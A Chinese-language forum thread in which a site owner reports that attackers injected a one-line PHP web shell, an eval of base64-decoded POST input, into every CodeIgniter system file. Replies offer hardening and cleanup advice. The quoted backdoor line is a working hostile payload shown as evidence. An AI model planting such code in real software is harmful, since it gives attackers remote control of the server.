急!急,我的网站被别人攻击了,是否CI有漏洞?求大神出招

lianke123

我的网站被别人攻击了,是否CI有漏洞?

PHP复制代码

 
Notice: Undefined index: nd335c3 in D:\AppServ\www\system\codeigniter\CodeIgniter.php on line 1
A PHP Error was encountered
 
Severity: Warning
 
Message: Cannot modify header information - headers already sent by (output started at D:\AppServ\www\system\codeigniter\CodeIgniter.php:1)
 

复制代码

在每个文件中都加入了类似如下的代码

PHP复制代码

 
<?php
eval(base64_decode($_POST['nd335c3']));
?>
 

复制代码

基本上把系统文件都加入了,该如何处理?

乌龙球

给的信息太少判断不出来。
应该不是，估计是服务器权限设置不好。
扫一下目录看是否有后门文件，环境下有其它程序的话也应该扫一下。
可以把CI的system文件夹和application文件夹放在访问目录的父目录。做好访问权限设置。
-app
-sys
-web/index.php 入口文件。
win系操作系统，权限设置好的话也是很安全的。

彩色奶酪

这样的一句话攻击很容易解决的。